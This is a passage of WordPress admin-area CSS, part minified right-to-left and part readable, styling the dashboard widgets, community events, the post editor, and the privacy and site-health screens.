.welcome-widgets:before{content:"\f538";content:"\f538"/'';top:-2px}.welcome-panel .welcome-menus:before{content:"\f163";content:"\f163"/'';top:-2px}.welcome-panel .welcome-comments:before{content:"\f117";content:"\f117"/'';top:-1px}.welcome-panel .welcome-learn-more:before{content:"\f118";content:"\f118"/'';top:-1px}#dashboard_right_now .search-engines-info:before,#dashboard_right_now li a:before,#dashboard_right_now li>span:before{padding:0 0 0 5px;content:"\f159";content:"\f159"/''}#dashboard_right_now .page-count a:before,#dashboard_right_now .page-count span:before{content:"\f105";content:"\f105"/''}#dashboard_right_now .post-count a:before,#dashboard_right_now .post-count span:before{content:"\f109";content:"\f109"/''}#dashboard_right_now .comment-count a:before{content:"\f101";content:"\f101"/''}#dashboard_right_now .comment-mod-count a:before{content:"\f125";content:"\f125"/''}#dashboard_right_now .storage-count a:before{content:"\f104";content:"\f104"/''}#dashboard_right_now .storage-count.warning a:before{content:"\f153";content:"\f153"/''}#dashboard_right_now .search-engines-info:before{content:"\f348";content:"\f348"/'';color:#d63638}.community-events-errors{margin:0}.community-events-loading{padding:10px 12px 8px}.community-events{margin-bottom:6px;padding:0 12px}.community-events .spinner{margin:0 2px 0}.community-events form[aria-hidden=true],.community-events-errors [aria-hidden=true],.community-events-errors[aria-hidden=true],.community-events-loading[aria-hidden=true],.community-events[aria-hidden=true]{display:none}.community-events .activity-block:first-child,.community-events h2{padding-top:12px;padding-bottom:10px}.community-events-form{margin:15px 0 5px;display:flex;gap:5px;align-items:center;flex-wrap:wrap}.community-events-form .regular-text{width:40%;margin:0;min-height:32px;padding:0 8px}#dashboard-widgets .community-events-form .button{min-height:32px;line-height:2.30769231;padding:0 12px}.community-events li.event-none{border-right:4px solid var(--wp-admin-theme-color,#3858e9)}#dashboard-widgets .community-events li.event-none a{text-decoration:underline}.community-events-form label{line-height:2.14285714}.community-events .activity-block>p{margin-bottom:0;display:inline}.community-events-toggle-location{vertical-align:middle}#dashboard-widgets .community-events-cancel.button-link{text-decoration:underline}.community-events ul{background-color:rgba(var(--wp-admin-theme-color--rgb),.08);padding-right:0;padding-left:0;padding-bottom:0}.community-events li{margin:0;padding:8px 12px;color:#2c3338}.community-events li:first-child{border-top:1px solid #e9e9ed}.community-events li~li{border-top:1px solid #e9e9ed}.community-events .activity-block.last{border-bottom:1px solid #e9e9ed;padding-top:0;margin-top:-1px}.community-events .event-info{display:block}.community-events .ce-separator::before{content:"\2022";content:"\2022"/''}.event-icon{height:18px;padding-left:10px;width:18px;display:none}.event-icon:before{color:#646970;font-size:18px}.event-meetup .event-icon:before{content:"\f484";content:"\f484"/''}.event-wordcamp .event-icon:before{content:"\f486";content:"\f486"/''}.community-events .event-title{font-weight:600;display:block}.community-events .event-date,.community-events .event-time{display:block}.community-events-footer{margin-top:0;margin-bottom:0;padding:12px;border-top:1px solid #f0f0f1;color:#646970}.community-events-footer .screen-reader-text{height:inherit;white-space:nowrap}#dashboard_primary .inside{margin:0;padding:0}#dashboard_primary .widget-loading{padding:12px 12px 0;margin-bottom:1em!important}#dashboard_primary .inside .notice{margin:0}body #dashboard-widgets .postbox form .submit{margin:0}.dashboard-widget-control-form p{margin-top:0}.rssSummary{color:#646970;margin-top:4px}#dashboard_primary .rss-widget{font-size:13px;padding:0 12px}#dashboard_primary .rss-widget:last-child{border-bottom:none;padding-bottom:8px}#dashboard_primary .rss-widget a{font-weight:400}#dashboard_primary .rss-widget span,#dashboard_primary .rss-widget span.rss-date{color:#646970}#dashboard_primary .rss-widget span.rss-date{margin-right:12px}#dashboard_primary .rss-widget ul li{padding:4px 0;margin:0}#dashboard_right_now ul{margin:0;display:inline-block;width:100%}#dashboard_right_now li{width:50%;float:right;margin-bottom:10px}#dashboard_right_now .main p{margin:0}#dashboard_right_now #wp-version-message .button{float:left;position:relative;top:-5px;margin-right:5px}#dashboard_right_now p.search-engines-info{margin:1em 0}.mu-storage{overflow:hidden}#dashboard-widgets h3.mu-storage{margin:0 0 10px;padding:0;font-size:14px;font-weight:400}#network_dashboard_right_now p input{margin:2px 1px;vertical-align:middle}#dashboard_right_now .sub{color:#50575e;background:#f6f7f7;border-top:1px solid #f0f0f1;padding:10px 12px 6px}#dashboard_right_now .sub h3{color:#50575e}#dashboard_right_now .sub p{margin:0 0 1em}#dashboard_right_now .warning a:before,#dashboard_right_now .warning span:before{color:#d63638}#dashboard_quick_press .inside{margin:0;padding:0}#dashboard_quick_press div.updated{margin-bottom:10px;border:1px solid #f0f0f1;border-width:1px 0 1px 1px}#dashboard_quick_press form{margin:12px}#dashboard_quick_press .drafts{padding:10px 0 0}#dashboard_quick_press label{display:inline-block;margin-bottom:4px}#dashboard_quick_press input,#dashboard_quick_press textarea{box-sizing:border-box;margin:0}#dashboard-widgets .postbox form .submit{margin:-39px 0;float:left}#description-wrap{margin-top:12px}#quick-press textarea#content{min-height:90px;max-height:1300px;margin:0 0 8px;padding:8px 12px;resize:none}.js #dashboard_quick_press .drafts{border-top:1px solid #f0f0f1}#dashboard_quick_press .drafts abbr{border:none}#dashboard_quick_press .drafts .view-all{float:left;margin:0 0 0 12px}#dashboard_primary a.rsswidget{font-weight:400}#dashboard_quick_press .drafts ul{margin:0 12px}#dashboard_quick_press .drafts li{margin-bottom:1em}#dashboard_quick_press .drafts li time{color:#646970}#dashboard_quick_press .drafts p{margin:0;word-wrap:break-word}#dashboard_quick_press .draft-title{word-wrap:break-word}#dashboard_quick_press .draft-title a,#dashboard_quick_press .draft-title time{margin:0 0 0 5px}#dashboard-widgets h3,#dashboard-widgets h4,#dashboard_quick_press .drafts h2{margin:0 12px 8px;padding:0;font-size:14px;font-weight:400;color:#1d2327}#dashboard_quick_press .drafts h2{line-height:inherit}#dashboard-widgets .inside h3,#dashboard-widgets .inside h4{margin-right:0;margin-left:0}#dashboard_activity .comment-meta span.approve:before{content:"\f227";content:"\f227"/'';font:20px/.5 dashicons;margin-right:5px;vertical-align:middle;position:relative;top:-1px;margin-left:2px}#dashboard_activity .inside{margin:0;padding:0 12px}#dashboard_activity .no-activity{overflow:hidden;padding:12px 0;text-align:center}#dashboard_activity .no-activity p{color:#646970;font-size:16px}#dashboard_activity .subsubsub{float:none;border-top:1px solid #f0f0f1;margin:0 -12px;padding:8px 12px 4px}#dashboard_activity .subsubsub a .count,#dashboard_activity .subsubsub a.current .count{color:#646970}#future-posts ul,#published-posts ul{margin:8px -12px 0 -12px}#future-posts li,#published-posts li{display:grid;grid-template-columns:clamp(160px,calc(2vw + 140px),200px) auto;column-gap:10px;color:#646970;padding:4px 12px}#future-posts li:nth-child(odd),#published-posts li:nth-child(odd){background-color:#f6f7f7}.activity-block{border-bottom:1px solid #f0f0f1;margin:0 -12px 6px -12px;padding:8px 12px 4px}.activity-block:last-child{border-bottom:none;margin-bottom:0}.activity-block .subsubsub li{color:#646970}#activity-widget #the-comment-list div.undo,#activity-widget #the-comment-list tr.undo{background:0 0;padding:6px 0;margin-right:12px}#activity-widget #the-comment-list .comment-item{background:#f6f7f7;padding:12px;position:relative}#activity-widget #the-comment-list .avatar{position:absolute;top:12px}#activity-widget #the-comment-list .dashboard-comment-wrap.has-avatar{padding-right:63px}#activity-widget #the-comment-list .dashboard-comment-wrap blockquote{margin:1em 0}#activity-widget #the-comment-list .comment-item p.row-actions{margin:4px 0 0}#activity-widget #the-comment-list .comment-item:first-child{border-top:1px solid #f0f0f1}#activity-widget #the-comment-list .unapproved{background-color:#fcf9e8}#activity-widget #the-comment-list .unapproved:before{content:"";display:block;position:absolute;right:0;top:0;bottom:0;background:#d63638;width:4px}#activity-widget #the-comment-list .spam-undo-inside .avatar,#activity-widget #the-comment-list .trash-undo-inside .avatar{position:relative;top:0}#dashboard-widgets #dashboard_browser_nag.postbox .inside{margin:10px}.postbox .button-link .edit-box{display:none}.edit-box{opacity:0}.edit-box:focus,.hndle:hover .edit-box{opacity:1}#dashboard-widgets form .input-text-wrap input{width:100%}#dashboard-widgets form .textarea-wrap textarea{width:100%}#dashboard-widgets .postbox form .submit{float:none;margin:.5em 0 0;padding:0;border:none}#dashboard-widgets-wrap #dashboard-widgets .postbox form .submit #publish{min-width:0}#dashboard-widgets .button-link,#dashboard-widgets li a,.community-events-footer a{text-decoration:none}#dashboard-widgets h2 a{text-decoration:underline}#dashboard-widgets .hndle .postbox-title-action{float:left;line-height:1.2}#dashboard_plugins h5{font-size:14px}#latest-comments #the-comment-list{position:relative;margin:0 -12px}#activity-widget #the-comment-list .comment,#activity-widget #the-comment-list .pingback{box-shadow:inset 0 1px 0 rgba(0,0,0,.06)}#activity-widget .comments #the-comment-list .alt{background-color:transparent}#activity-widget #latest-comments #the-comment-list .comment-item{min-height:50px;margin:0;padding:12px}#latest-comments #the-comment-list .pingback{padding-right:12px!important}#latest-comments #the-comment-list .comment-item:first-child{border-top:none}#latest-comments #the-comment-list .comment-meta{line-height:1.5;margin:0;color:#646970}#latest-comments #the-comment-list .comment-meta cite{font-style:normal;font-weight:400}#latest-comments #the-comment-list .comment-item blockquote,#latest-comments #the-comment-list .comment-item blockquote p{margin:0;padding:0;display:inline}#latest-comments #the-comment-list .comment-item p.row-actions{margin:3px 0 0;padding:0;font-size:13px}.rss-widget ul{margin:0;padding:0;list-style:none}a.rsswidget{font-size:13px;font-weight:600;line-height:1.4}.rss-widget ul li{line-height:1.5;margin-bottom:12px}.rss-widget span.rss-date{color:#646970;font-size:13px;margin-right:3px}.rss-widget cite{display:block;text-align:left;margin:0 0 1em;padding:0}.rss-widget cite:before{content:"\2014";content:"\2014"/''}.dashboard-comment-wrap{word-wrap:break-word}#dashboard_browser_nag a.update-browser-link{font-size:1.2em;font-weight:600}#dashboard_browser_nag a{text-decoration:underline}#dashboard_browser_nag p.browser-update-nag.has-browser-icon{padding-left:128px}#dashboard_browser_nag .browser-icon{margin-top:-32px}#dashboard_browser_nag.postbox{background-color:#b32d2e;background-image:none;border-color:#b32d2e;color:#fff;box-shadow:none}#dashboard_browser_nag.postbox h2{border-bottom-color:transparent;background:transparent none;color:#fff;box-shadow:none}#dashboard_browser_nag a{color:#fff}#dashboard_browser_nag.postbox .postbox-header{border-color:transparent}#dashboard_browser_nag h2.hndle{border:none;font-weight:600;font-size:20px;padding-top:10px}.postbox#dashboard_browser_nag p a.dismiss{font-size:14px}.postbox#dashboard_browser_nag a,.postbox#dashboard_browser_nag p,.postbox#dashboard_browser_nag p.browser-update-nag{font-size:16px}#dashboard_php_nag .dashicons-warning{color:#dba617;padding-left:6px}#dashboard_php_nag.php-no-security-updates .dashicons-warning,#dashboard_php_nag.php-version-lower-than-future-minimum .dashicons-warning{color:#d63638}#dashboard_php_nag h2{display:inline-block}#dashboard_php_nag p{margin:12px 0}.bigger-bolder-text{font-weight:600;font-size:14px}@media only screen and (min-width:1600px){.welcome-panel .welcome-panel-column-container{display:flex;justify-content:center}.welcome-panel-column{width:100%;max-width:460px}}@media only screen and (max-width:799px){#wpbody-content #dashboard-widgets .postbox-container{width:100%}#dashboard-widgets .meta-box-sortables{min-height:0}.is-dragging-metaboxes #dashboard-widgets .meta-box-sortables{min-height:100px}#dashboard-widgets .meta-box-sortables.empty-container{margin-bottom:0}}@media only screen and (min-width:800px) and (max-width:1499px){#wpbody-content #dashboard-widgets .postbox-container{width:49.5%}#wpbody-content #dashboard-widgets #postbox-container-2,#wpbody-content #dashboard-widgets #postbox-container-3,#wpbody-content #dashboard-widgets #postbox-container-4{float:left;width:50.5%}#dashboard-widgets #postbox-container-3 .empty-container,#dashboard-widgets #postbox-container-4 .empty-container{border:none;height:0;min-height:0;margin-bottom:0;display:none}#dashboard-widgets #postbox-container-3 .empty-container:after,#dashboard-widgets #postbox-container-4 .empty-container:after{display:none}#wpbody #wpbody-content #dashboard-widgets.columns-1 .postbox-container{width:100%}#wpbody #dashboard-widgets .metabox-holder.columns-1 .postbox-container .empty-container{border:none;height:0;min-height:0;margin-bottom:0}.index-php .columns-prefs,.index-php .screen-layout{display:block}.columns-prefs .columns-prefs-3,.columns-prefs .columns-prefs-4{display:none}#dashboard-widgets .postbox-container .empty-container:after{display:block}}@media only screen and (min-width:1500px) and (max-width:1800px){#wpbody-content #dashboard-widgets .postbox-container{width:33.5%}#wpbody-content #dashboard-widgets #postbox-container-1{width:33%}#wpbody-content #dashboard-widgets #postbox-container-3,#wpbody-content #dashboard-widgets #postbox-container-4{float:left}#dashboard-widgets #postbox-container-4 .empty-container{border:none;height:0;min-height:0;margin-bottom:0;display:none}#dashboard-widgets #postbox-container-4 .empty-container:after{display:none}#dashboard-widgets .postbox-container .empty-container:after{display:block}}@media only screen and (min-width:1801px){#dashboard-widgets .postbox-container .empty-container:after{display:block}}@media screen and (max-width:870px){.welcome-panel .welcome-panel-column li{display:inline-block;margin-left:13px}.welcome-panel .welcome-panel-column ul{margin:.4em 0 0}}@media screen and (max-width:1180px) and (min-width:783px){.welcome-panel-column{grid-template-columns:1fr}.welcome-panel-column>svg,[class*=welcome-panel-icon]{display:none}}@media screen and (max-width:782px){.welcome-panel .welcome-panel-column-container{grid-template-columns:1fr;box-sizing:border-box;padding:32px;width:100%}.welcome-panel .welcome-panel-column-content{max-width:520px}.welcome-panel .welcome-panel-close{overflow:hidden;text-indent:40px;white-space:nowrap;width:20px;height:20px;padding:5px;top:5px;left:5px}.welcome-panel .welcome-panel-close::before{position:absolute;top:5px;right:-35px}#dashboard-widgets h2{padding:12px}#dashboard_recent_comments #the-comment-list .comment-item .avatar{height:30px;width:30px;margin:4px 0 5px 10px}.community-events-toggle-location{height:38px;vertical-align:baseline}#community-events-submit{margin-bottom:0}#dashboard-widgets .community-events-cancel.button-link,.community-events-form label{font-size:14px;line-height:normal;padding:6px 0;border:1px solid transparent}}@media screen and (max-width:600px){.welcome-panel-header{padding:32px 32px 64px}.welcome-panel-header-image{display:none}}@media screen and (max-width:480px){.welcome-panel-column{gap:16px}}@media screen and (max-width:360px){.welcome-panel-column{grid-template-columns:1fr}.welcome-panel-column>svg,[class*=welcome-panel-icon]{display:none}}@media screen and (min-width:355px){.community-events .event-info{display:table-row;float:right;max-width:59%}.event-icon,.event-icon[aria-hidden=true]{display:table-cell}.event-info-inner{display:table-cell}.community-events .event-date-time{float:left;max-width:39%}.community-events .event-date,.community-events .event-time{text-align:left}}#poststuff { padding-top: 10px; min-width: 763px; } #poststuff #post-body { padding: 0; } #poststuff .postbox-container { width: 100%; } #poststuff #post-body.columns-2 { margin-right: 300px; } /*------------------------------------------------------------------------------ 11.0 - Write/Edit Post Screen ------------------------------------------------------------------------------*/ #show-comments { overflow: hidden; } #save-action .spinner, #show-comments a { float: left; } #show-comments .spinner { float: none; margin-top: 0; } #lost-connection-notice .spinner { visibility: visible; float: left; margin: 0 5px 0 0; } #titlediv { position: relative; } #titlediv label { cursor: text; } #titlediv div.inside { margin: 0; } #poststuff #titlewrap { border: 0; padding: 0; } #titlediv #title { padding: 3px 8px; font-size: 1.7em; line-height: 100%; height: 1.7em; width: 100%; outline: none; margin: 0 0 3px; background-color: #fff; } #titlediv #title-prompt-text { color: #646970; position: absolute; font-size: 1.7em; padding: 10px; pointer-events: none; } #titlewrap .skiplink { background: #fff; line-height: 2.30769231; /* 30px for 32px min-height */ min-height: 32px; right: 4px; } #titlewrap .skiplink:focus { clip: inherit; clip-path: inherit; top: 4px; width: auto; } input#link_description, input#link_url { width: 100%; } #pending { background: 0 none; border: 0 none; padding: 0; font-size: 11px; margin-top: -1px; } #edit-slug-box, #comment-link-box { line-height: 1.84615384; min-height: 25px; margin-top: 5px; padding: 0 10px; color: #646970; } #sample-permalink { display: inline-block; max-width: 100%; word-wrap: break-word; } #edit-slug-box .cancel { margin-right: 10px; padding: 0; } #comment-link-box { margin: 5px 0; padding: 0 5px; } #editable-post-name-full { display: none; } #editable-post-name { font-weight: 600; } #editable-post-name input { font-size: 13px; font-weight: 400; min-height: 32px; margin: 0; width: 16em; } .postarea h3 label { float: left; } body.post-new-php .submitbox .submitdelete { display: none; } .submitbox .submit a:hover { text-decoration: underline; } .submitbox .submit input { margin-bottom: 8px; margin-right: 4px; padding: 6px; } #post-status-select { margin-top: 3px; } body.post-type-wp_navigation div#minor-publishing, body.post-type-wp_navigation .inline-edit-status { display: none; } /* Post Screen */ /* Only highlight drop zones when dragging and only in the 2 columns layout. */ .is-dragging-metaboxes .metabox-holder .postbox-container .meta-box-sortables { border-radius: 8px; background: rgb(var(--wp-admin-theme-color--rgb), 0.04); /* * This min-height is meant to limit jumpiness while dragging. It's equivalent * to the minimum height of the sortable-placeholder which is given by the height * of a collapsed post box (36px + 1px top and bottom borders) + the placeholder * bottom margin (20px) + 2 additional pixels to compensate browsers rounding. */ min-height: 60px; margin-bottom: 20px; } .postbox { position: relative; min-width: 255px; border: 1px solid #c3c4c7; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04); background: #fff; } #trackback_url { width: 99%; } #normal-sortables .postbox .submit { background: transparent none; border: 0 none; float: right; padding: 0 12px; margin: 0; } .category-add input[type="text"], .category-add select { width: 100%; max-width: 260px; vertical-align: baseline; } #side-sortables .category-add input[type="text"], #side-sortables .category-add select { margin: 0 0 1em; } ul.category-tabs li, #side-sortables .add-menu-item-tabs li, .wp-tab-bar li { display: inline; line-height: 1.35; } .no-js .category-tabs li.hide-if-no-js { display: none; } .category-tabs a, #side-sortables .add-menu-item-tabs a, .wp-tab-bar a { text-decoration: none; } /* @todo: do these really need to be so specific? */ #side-sortables .category-tabs .tabs a, #side-sortables .add-menu-item-tabs .tabs a, .wp-tab-bar .wp-tab-active a, #post-body ul.category-tabs li.tabs a, #post-body ul.add-menu-item-tabs li.tabs a { color: #2c3338; } .category-tabs { margin: 8px 0 5px; } /* Back-compat for pre-4.4 */ #category-adder h4 { margin: 0; } .taxonomy-add-new { display: inline-block; margin: 10px 0; font-weight: 600; } #side-sortables .add-menu-item-tabs, .wp-tab-bar { margin-bottom: 3px; } #normal-sortables .postbox #replyrow .submit { float: none; margin: 0; padding: 5px 7px 10px; overflow: hidden; } #side-sortables .submitbox .submit input, #side-sortables .submitbox .submit .preview, #side-sortables .submitbox .submit a.preview:hover { border: 0 none; } /* @todo: make this a more generic class */ ul.category-tabs, ul.add-menu-item-tabs, ul.wp-tab-bar { margin-top: 12px; } ul.category-tabs li, ul.add-menu-item-tabs li { border: solid 1px transparent; position: relative; } ul.category-tabs li.tabs, ul.add-menu-item-tabs li.tabs, .wp-tab-active { border: 1px solid #dcdcde; border-bottom-color: #fff; background-color: #fff; } ul.category-tabs li, ul.add-menu-item-tabs li, ul.wp-tab-bar li { padding: 3px 5px 6px; } #set-post-thumbnail { display: inline-block; max-width: 100%; } #postimagediv .inside img { max-width: 100%; height: auto; vertical-align: top; background-image: linear-gradient(45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7), linear-gradient(45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7); background-position: 0 0, 10px 10px; background-size: 20px 20px; } form#tags-filter { position: relative; } /* Global classes */ .wp-hidden-children .wp-hidden-child, .ui-tabs-hide { display: none; } #post-body .tagsdiv #newtag { margin-right: 0; flex: 1; min-width: 0; } #side-sortables input#post_password { width: 94% } #side-sortables .tagsdiv #newtag { flex: 1; min-width: 0; } #post-status-info { width: 100%; border-spacing: 0; border: 1px solid #c3c4c7; border-top: none; background-color: #f6f7f7; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04); z-index: 999; } #post-status-info td { font-size: 12px; } .autosave-info { padding: 2px 10px; text-align: right; } #editorcontent #post-status-info { border: none; } #content-resize-handle { background: transparent url(../images/resize.gif) no-repeat scroll right bottom; width: 12px; cursor: row-resize; } /*rtl:ignore*/ .rtl #content-resize-handle { background-image: url(../images/resize-rtl.gif); background-position: left bottom; } .wp-editor-expand #content-resize-handle { display: none; } #postdivrich #content { resize: none; } #wp-word-count { padding: 2px 10px; } #wp-content-editor-container { position: relative; } .wp-editor-expand #wp-content-editor-tools { z-index: 1000; border-bottom: 1px solid #c3c4c7; } .wp-editor-expand #wp-content-editor-container { box-shadow: none; margin-top: -1px; } .wp-editor-expand #wp-content-editor-container { border-bottom: 0 none; } .wp-editor-expand div.mce-statusbar { z-index: 1; } .wp-editor-expand #post-status-info { border-top: 1px solid #c3c4c7; } .wp-editor-expand div.mce-toolbar-grp { z-index: 999; } /* TinyMCE native fullscreen mode override */ .mce-fullscreen #wp-content-wrap .mce-menubar, .mce-fullscreen #wp-content-wrap .mce-toolbar-grp, .mce-fullscreen #wp-content-wrap .mce-edit-area, .mce-fullscreen #wp-content-wrap .mce-statusbar { position: static !important; width: auto !important; padding: 0 !important; } .mce-fullscreen #wp-content-wrap .mce-statusbar { visibility: visible !important; } .mce-fullscreen #wp-content-wrap .mce-tinymce .mce-wp-dfw { display: none; } .post-php.mce-fullscreen #wpadminbar, .mce-fullscreen #wp-content-wrap .mce-wp-dfw { display: none; } /* End TinyMCE native fullscreen mode override */ #wp-content-editor-tools { background-color: #f0f0f1; padding-top: 20px; } #poststuff #post-body.columns-2 #side-sortables { width: 280px; } #timestampdiv select { vertical-align: top; font-size: 12px; line-height: 2.33333333; /* 28px */ } #aa, #jj, #hh, #mn { padding: 6px 1px; font-size: 12px; line-height: 1.16666666; /* 14px */ } #jj, #hh, #mn { width: 2em; } #aa { width: 3.4em; } .curtime #timestamp { padding: 2px 0 1px; display: inline !important; height: auto !important; } #post-body .misc-pub-post-status:before, #post-body #visibility:before, .curtime #timestamp:before, #post-body .misc-pub-uploadedby:before, #post-body .misc-pub-uploadedto:before, #post-body .misc-pub-revisions:before, #post-body .misc-pub-response-to:before, #post-body .misc-pub-comment-status:before { color: #8c8f94; } #post-body .misc-pub-post-status:before, #post-body #visibility:before, .curtime #timestamp:before, #post-body .misc-pub-uploadedby:before, #post-body .misc-pub-uploadedto:before, #post-body .misc-pub-revisions:before, #post-body .misc-pub-response-to:before, #post-body .misc-pub-comment-status:before { font: normal 20px/1 dashicons; display: inline-block; margin-left: -1px; padding-right: 3px; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } #post-body .misc-pub-post-status:before, #post-body .misc-pub-comment-status:before { content: "\f173"; content: "\f173" / ''; } #post-body #visibility:before { content: "\f177"; content: "\f177" / ''; } .curtime #timestamp:before { content: "\f145"; content: "\f145" / ''; position: relative; top: -1px; } #post-body .misc-pub-uploadedby:before { content: "\f110"; content: "\f110" / ''; position: relative; top: -1px; } #post-body .misc-pub-uploadedto:before { content: "\f318"; content: "\f318" / ''; position: relative; top: -1px; } #post-body .misc-pub-revisions:before { content: "\f321"; content: "\f321" / ''; } #post-body .misc-pub-response-to:before { content: "\f101"; content: "\f101" / ''; } #timestampdiv { padding-top: 5px; line-height: 1.76923076; } #timestampdiv p { margin: 8px 0 6px; } #timestampdiv input { text-align: center; } .notification-dialog { position: fixed; top: 30%; max-height: 70%; left: 50%; width: 450px; margin-left: -225px; background: #fff; box-shadow: 0 3px 6px rgba(0, 0, 0, 0.3); line-height: 1.5; z-index: 1000005; overflow-y: auto; } .notification-dialog-background { position: fixed; top: 0; left: 0; right: 0; bottom: 0; background: #000; opacity: 0.7; filter: alpha(opacity=70); z-index: 1000000; } #post-lock-dialog .post-locked-message, #post-lock-dialog .post-taken-over { margin: 25px; } #post-lock-dialog .post-locked-message a.button, #file-editor-warning .button { margin-right: 10px; } #post-lock-dialog .post-locked-avatar { float: left; margin: 0 20px 20px 0; } #post-lock-dialog .wp-tab-first { outline: 0; } #post-lock-dialog .locked-saving img { float: left; margin-right: 3px; } #post-lock-dialog.saving .locked-saving, #post-lock-dialog.saved .locked-saved { display: inline; } #excerpt { display: block; margin: 12px 0 0; height: 4em; width: 100%; } .tagchecklist { margin-left: 14px; font-size: 12px; overflow: auto; } .tagchecklist br { display: none; } .tagchecklist strong { margin-left: -8px; position: absolute; } .tagchecklist > li { float: left; margin-right: 25px; font-size: 13px; line-height: 1.8; cursor: default; max-width: 100%; overflow: hidden; text-overflow: ellipsis; } .tagchecklist .ntdelbutton { position: absolute; width: 24px; height: 24px; border: none; margin: 0 0 0 -19px; padding: 0; background: none; cursor: pointer; text-indent: 0; } #poststuff h3.hndle, /* Back-compat for pre-4.4 */ #poststuff .stuffbox > h3, /* Back-compat for pre-4.4 */ #poststuff h2 { font-size: 14px; padding: 8px 12px; margin: 0; line-height: 1.4; } #poststuff .stuffbox h2 { padding: 8px 10px; } #poststuff .stuffbox > h2 { border-bottom: 1px solid #f0f0f1; } #poststuff .inside { margin: 6px 0 0; } .link-php #poststuff .inside, .link-add-php #poststuff .inside { margin-top: 12px; } #poststuff .stuffbox .inside { margin: 0; } #poststuff .inside #parent_id, #poststuff .inside #page_template { max-width: 100%; } .post-attributes-label-wrapper { margin-bottom: 0.5em; } .post-attributes-label { vertical-align: baseline; font-weight: 600; } #post-visibility-select, #comment-status-radio { line-height: 1.5; margin-top: 3px; } #linksubmitdiv .inside, /* Old Link Manager back-compat. */ #poststuff #submitdiv .inside { margin: 0; padding: 0; } #post-body-content, .edit-form-section { margin-bottom: 20px; } .wp_attachment_details .attachment-content-description { margin-top: 0.5385em; display: inline-block; min-height: 1.6923em; } /** * Privacy Settings section * * Note: This section includes selectors from * Site Health where duplicate styling is used. */ /* General */ .privacy-settings #wpcontent, .privacy-settings.auto-fold #wpcontent, .site-health #wpcontent, .site-health.auto-fold #wpcontent { padding-left: 0; } /* Better position for the WordPress admin notices. */ .privacy-settings .notice, .site-health .notice { margin: 25px 20px 15px 22px; } .privacy-settings .notice ~ .notice, .site-health .notice ~ .notice { margin-top: 5px; } /* Emulates .wrap h1 styling */ .privacy-settings-header h1, .health-check-header h1 { display: inline-block; font-weight: 600; margin: 0 0.8rem 1rem; font-size: 23px; padding: 9px 0 4px; line-height: 1.3; } /* Header */ .privacy-settings-header, .health-check-header { text-align: center; margin: 0 0 1rem; background: #fff; border-bottom: 1px solid #dcdcde; } .privacy-settings-title-section, .health-check-title-section { display: flex; align-items: center; justify-content: center; clear: both; padding-top: 8px; } .privacy-settings-tabs-wrapper { /* IE 11 */ display: -ms-inline-grid; -ms-grid-columns: 1fr 1fr; vertical-align: top; /* modern browsers */ display: inline-grid; grid-template-columns: 1fr 1fr; } .privacy-settings-tab { display: block; /* IE 11 */ text-decoration: none; color: inherit; padding: 0.5rem 1rem 1rem; margin: 0 1rem; transition: box-shadow 0.5s ease-in-out; } .privacy-settings-tab:nth-child(1), .health-check-tab:nth-child(1) { -ms-grid-column: 1; /* IE 11 */ } .privacy-settings-tab:nth-child(2), .health-check-tab:nth-child(2) { -ms-grid-column: 2; /* IE 11 */ } .privacy-settings-tab:focus, .health-check-tab:focus { color: #1d2327; outline: 1px solid #787c82; box-shadow: none; } .privacy-settings-tab.active, .health-check-tab.active { box-shadow: inset 0 -3px var(--wp-admin-theme-color); font-weight: 600; } /* Body */ .privacy-settings-body, .health-check-body { max-width: 800px; margin: 0 auto; } .tools-privacy-policy-page th { min-width: 230px; } .hr-separator { margin-top: 20px; margin-bottom: 15px; } /* Accordions */ .privacy-settings-accordion, .health-check-accordion { border: 1px solid #c3c4c7; } .privacy-settings-accordion-heading, .health-check-accordion-heading { margin: 0; border-top: 1px solid #c3c4c7; font-size: inherit; line-height: inherit; font-weight: 600; color: inherit; } .privacy-settings-accordion-heading:first-child, .health-check-accordion-heading:first-child { border-top: none; } .privacy-settings-accordion-trigger, .health-check-accordion-trigger { background: #fff; border: 0; color: #2c3338; cursor: pointer; display: flex; font-weight: 400; margin: 0; padding: 1em 3.5em 1em 1.5em; min-height: 46px; position: relative; text-align: left; width: 100%; align-items: center; justify-content: space-between; -webkit-user-select: auto; user-select: auto; } .privacy-settings-accordion-trigger:hover, .privacy-settings-accordion-trigger:active, .health-check-accordion-trigger:hover, .health-check-accordion-trigger:active { background: #f6f7f7; } .privacy-settings-accordion-trigger:focus, .health-check-accordion-trigger:focus { color: #1d2327; border: none; box-shadow: none; outline-offset: -1px; outline: 2px solid var(--wp-admin-theme-color); background-color: #f6f7f7; } .privacy-settings-accordion-trigger .title, .health-check-accordion-trigger .title { pointer-events: none; font-weight: 600; flex-grow: 1; } .privacy-settings-accordion-trigger .icon, .privacy-settings-view-read .icon, .health-check-accordion-trigger .icon, .site-health-view-passed .icon { border: solid #50575e; border-width: 0 2px 2px 0; height: 0.5rem; pointer-events: none; position: absolute; right: 1.5em; top: 50%; transform: translateY(-70%) rotate(45deg); width: 0.5rem; } .privacy-settings-accordion-trigger .badge, .health-check-accordion-trigger .badge { padding: 0.1rem 0.5rem 0.15rem; color: #2c3338; font-weight: 600; } .privacy-settings-accordion-trigger .badge { margin-left: 0.5rem; } .privacy-settings-accordion-trigger .badge.blue, .health-check-accordion-trigger .badge.blue { border: 1px solid var(--wp-admin-theme-color); } .privacy-settings-accordion-trigger .badge.orange, .health-check-accordion-trigger .badge.orange { border: 1px solid #dba617; } .privacy-settings-accordion-trigger .badge.red, .health-check-accordion-trigger .badge.red { border: 1px solid #e65054; } .privacy-settings-accordion-trigger .badge.green, .health-check-accordion-trigger .badge.green { border: 1px solid #00ba37; } .privacy-settings-accordion-trigger .badge.purple, .health-check-accordion-trigger .badge.purple { border: 1px solid #2271b1; } .privacy-settings-accordion-trigger .badge.gray, .health-check-accordion-trigger .badge.gray { border: 1px solid #c3c4c7; } .privacy-settings-accordion-trigger[aria-expanded="true"] .icon, .privacy-settings-view-passed[aria-expanded="true"] .icon, .health-check-accordion-trigger[aria-expanded="true"] .icon, .site-health-view-passed[aria-expanded="true"] .icon { transform: translateY(-30%) rotate(-135deg) } .privacy-settings-accordion-panel, .health-check-accordion-panel { margin: 0; padding: 1em 1.5em; background: #fff; } .privacy-settings-accordion-panel[hidden], 